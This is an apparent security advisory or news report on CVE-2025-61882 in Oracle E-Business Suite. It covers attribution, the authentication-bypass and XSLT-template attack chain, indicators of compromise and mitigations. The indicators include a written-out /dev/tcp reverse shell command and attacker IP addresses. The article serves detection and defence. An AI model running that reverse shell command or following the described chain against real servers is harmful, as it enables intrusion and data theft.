A critical zero-day vulnerability, identified as CVE-2025-61882, has been discovered in Oracle E-Business Suite (EBS) applications, leading to widespread exploitation by cybercriminals. This flaw allows unauthenticated remote code execution (RCE), enabling attackers to bypass authentication mechanisms, deploy web shells, and exfiltrate sensitive data from internet-exposed EBS instances.
Discovery and Initial Exploitation
The vulnerability was first observed on August 9, 2025. Security firm CrowdStrike has attributed the mass exploitation campaign to the threat actor known as GRACEFUL SPIDER, with indications that other malicious groups may also be involved. On September 29, 2025, GRACEFUL SPIDER allegedly sent emails branded with the Clop ransomware name to multiple organizations, claiming successful data theft from Oracle EBS applications.
Technical Details of the Exploit
The exploitation process begins with an HTTP POST request to the `/OA_HTML/SyncServlet` endpoint, which triggers the authentication bypass. Once bypassed, attackers leverage administrative account privileges within EBS to target the XML Publisher Template Manager. This involves sending GET and POST requests to `/OA_HTML/RF.jsp` and `/OA_HTML/OA.jsp` to upload a malicious XSLT template. Commands embedded in this template execute upon preview, establishing an outbound Java process connection over port 443 to attacker-controlled infrastructure. This connection is typically used to load web shells, often through a two-step process:
1. Loading `FileUtils.java` to download a secondary backdoor named `Log4jConfigQpgsubFilter.java`.
2. Engaging the backdoor through a `doFilter` chain at the public endpoint `/OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/`, enabling command execution and persistence.
Public Disclosure and Further Exploitation
Shortly after the public disclosure of a proof-of-concept (PoC) exploit on October 3, 2025, and Oracle’s subsequent patch release, a Telegram channel post suggested collaboration between threat actors SCATTERED SPIDER, SLIPPY SPIDER, and the ShinyHunters group. The post included a purported EBS exploit with the SHA256 hash `76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d` and criticized GRACEFUL SPIDER’s tactics. Oracle’s advisory incorporated this PoC as an indicator of compromise (IOC), highlighting concerns over in-the-wild exploitation.
Indicators of Compromise (IoCs)
Organizations should be vigilant for the following IoCs associated with this exploitation:
– Malicious IP Addresses: 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 conducting GET and POST activities.
– Reverse Shell Commands: Commands such as `sh -c /bin/bash -i >& /dev/tcp// 0>&1` used to establish outbound TCP connections for persistent access.
– Malicious Artifacts: Exploitation toolkit named `oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip` with SHA-256 hash `76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d`, containing Python scripts `exp.py` and `server.py`.
Mitigation Measures
To protect against this vulnerability, organizations are strongly advised to:
1. Apply Patches Promptly: Implement Oracle’s October 4, 2025, patch immediately to address CVE-2025-61882.
2. Monitor Network Activity: Audit outbound connections for suspicious activity, particularly those involving Java processes connecting over port 443.
3. Review System Components: Examine the `xdo_templates_vl` view for unauthorized templates and investigate `icx_sessions` for anomalies involving UserID 0 and UserID 6.
4. Deploy Web Application Firewalls (WAFs): Protect exposed EBS services by implementing WAFs to filter and monitor HTTP requests.
5. Implement Endpoint Detection and Response (EDR): Deploy EDR agents on application servers and conduct behavioral analysis to detect anomalous child processes or unusual outbound traffic.
6. Limit Public Exposure: Restrict public access to Oracle EBS components. Where internet access is unavoidable, implement strict access control lists (ACLs) and network perimeter guidelines.
Conclusion
The exploitation of CVE-2025-61882 in Oracle E-Business Suite underscores the critical importance of timely patch management and proactive security measures. Organizations must remain vigilant, apply necessary patches without delay, and monitor their systems for signs of compromise to mitigate the risks associated with this vulnerability.
